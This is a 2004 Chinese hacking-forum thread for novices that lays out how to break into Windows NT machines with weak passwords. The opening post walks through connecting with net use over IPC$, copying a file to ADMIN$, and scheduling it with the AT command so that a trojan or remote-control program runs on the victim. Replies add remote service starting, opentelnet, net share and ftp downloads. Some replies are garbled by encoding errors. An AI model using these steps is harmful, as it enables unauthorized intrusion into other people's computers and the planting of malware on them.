|
 | 作者: lijingxi [lijingxi]
 见习版主 |
登录 |
| 首先你要查看一下对方的计算机是什么版本的 要是服务器版本的 就查看一下有没有开放3389端口,如果开放,用终端连接就好了, 要是没有开放你就要查看对方是不是开放139或者445端口,如果开放你直接用NET命令和对方建立空连接!格式如下: net use \\IP "密码" /user:用户名 如果显示命令成功,你就可以给对方COPY文件了.命令格式如下: COPY 文件名.扩展名 \\IP\共享名称 一般的计算机默认共享是: c$ ipc$ admin$ 例如: COPY 文件名.扩展名 \\IP\ADMIN$ 这样就可以把文件拷贝到对方的计算机系统盘的WINNT文件夹下面. 如果出现决绝访问 可能是你的权限不够, 如果出现: 找不到网络路径。 已复制 0 个文件。 这是对方没有共享, 如果拷贝文件成功,你可以查看对方的计算机时间,定时让对方的计算机运行你拷贝的程序,格式如下: net time \\IP 如果出现: \\IP 的当前时间是 2004/4/8 下午 12:48 命令成功完成。 表示成功,然后就是用AT命令来定时让对方的计算机运行你拷贝过去的文件!命令格式如下: AT \\IP 时间 文件名.扩展名 如果显示如下: 新加了一项作业,其作业 ID = 1 表示成功. 好了,剩下的我想你应该知道怎么做了吧! 注意:在AT命令里面写时间尽量使用24小时制,写时间要不查看到的时间提前1到2分钟,这样过1到2分钟,你指定的程序就会在对方的计算机上运行!如果是木马或者远程控制程序,你过2分钟就可以远程连接了! 哦对了,查看对方计算机共享的命令是net view \\ip 查看远程计算机共享资源,前提是建立了空连接后,不显示默认共享。 |
| 地主 发表时间: 04-04-08 13:04 |
 | 回复: chiru [chiru]  论坛用户 |
登录 |
|
补充,如果at命令不能启动后门程序,那是因为对方没有启动Schedule服务。由于此时我们已经是Administrator,所以可以利用微软的NT Rtk中的NetSvc来远程启动Schedule服务。 |
| B1层 发表时间: 04-04-08 17:19 |
| 回复: lijingxi [lijingxi] 见习版主 |
登录 |
|
谢谢! |
| B2层 发表时间: 04-04-08 17:57 |
| 回复: homorous [homorous]  论坛用户 |
登录 |
|
哈哈 我是菜到这也看不懂啊。。。 |
| B3层 发表时间: 04-04-08 20:57 |
 | 回复: ms_lxchen [ms_lxchen]  论坛用户 |
登录 |
|
如果是XP 或 Win2000 Server,还能用netsvc吗? |
| B4层 发表时间: 04-04-08 21:03 |
 | 回复: qq7758520 [qq7758520] 论坛用户 |
登录 |
|
你的意思是不是说 NT弱口令 只能用IPC进行连接吗? |
| B5层 发表时间: 04-04-09 21:30 |
| 回复: qq7758520 [qq7758520] 论坛用户 |
登录 |
|
有 没有什么别的用法? 我试过用3389登陆,但是没有成功。 |
| B6层 发表时间: 04-04-09 21:36 |
 | 回复: chen619 [chen619]  论坛用户 |
登录 |
|
斯文败类兄,你说的这些的前提是不是: 1.要知道用户名和密码~~ 2.必须有默认共享~~ 如果只检查到对方有IPC$,没有C$或D$,可不可以~~? |
| B7层 发表时间: 04-04-09 22:09 |
 | 回复: aserict [aserict] 论坛用户 |
登录 |
|
发这样的呀。不过对我们菜鸟却实有用。 |
| B8层 发表时间: 04-04-10 11:29 |
| 回复: chen619 [chen619] 论坛用户 |
登录 |
|
如果只有IPC$,没有C$或D$,没有用户名,可以建立空连接,可这用什么用????没有什么权限?? |
| B9层 发表时间: 04-04-10 13:49 |
 | 回复: kelan3713 [kelan3713] 论坛用户 |
登录 |
可是这我们也看不懂呀,我们的技术还没那么好呀.   |
| B10层 发表时间: 04-04-10 15:29 |
| 回复: lijingxi [lijingxi] 见习版主 |
登录 |
|
�Σ黄�,最近�挝皇虑楸容^多很忙�]有�砜创蠹业� 帖子,我�F在用繁�w中文的���X打字麻��. �巧系恼f�@些看不明白,那我是真的�]有�k法了,�@些是最基�A的了,一般很少有人看的,只�m合初�W者的教材. 引用: 如果只有IPC$,没有C$或D$,没有用户名,可以建立空连接,可这用什么用????没有什么权限?? �]有 用�裘�我只能是匿名空�B接,�嘞抟话愣际�guest 或者user�嘞�,我上面�f的 是有�嘞抻杏��裘�和密�a的入侵�k法 我�f了,菜�B看的 . 引用; 斯文败类兄,你说的这些的前提是不是: 1.要知道用户名和密码~~ 2.必须有默认共享~~ 如果只检查到对方有IPC$,没有C$或D$,可不可以~~? 是必��有用�裘�和密�a的,而且�_放IPC共享的才可以 如果�z查到�Ψ接� ipc 默�J共享 但是�]有C$ D$ ADMIN$ �@些共享 可以用opentelnet�@��工具�o�Ψ介_放telnet 然後登�� 用net share admin$�@�咏o�Ψ� �_放共享,然後�o�Ψ�copy 文件 或者直接 在telnet下用ftp下�d文件到�Ψ接脖P 我�F在用繁�w中文的���X 打字非常麻�� 要是打�e甚�N��大家不要笑我, 我��是那句�� 我是���o菜�B的 我也 是菜�B 高手就不要�y�槲伊� |
| B11层 发表时间: 04-04-10 16:01 |
| 回复: chen619 [chen619] 论坛用户 |
登录 |
|
引用: �]有 用�裘�我只能是匿名空�B接,�嘞抟话愣际�guest 或者user�嘞�,我上面�f的 是有�嘞抻杏��裘�和密�a的入侵�k法 我�f了,菜�B看的 --------我就是想知道在这种情况下怎么样将GUEST或者USER的权限提升~~~----------  |
| B12层 发表时间: 04-04-10 21:14 |
| 回复: chen619 [chen619] 论坛用户 |
登录 |
up~~~~~~~~~~~ |
| B13层 发表时间: 04-04-11 20:47 |
| 回复: lijingxi [lijingxi] 见习版主 |
登录 |
|
�巧系� 我也不知道 |
| B14层 发表时间: 04-04-12 09:44 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 回复:关于NT-Server弱口令的问题?高手不要看了,给菜鸟的!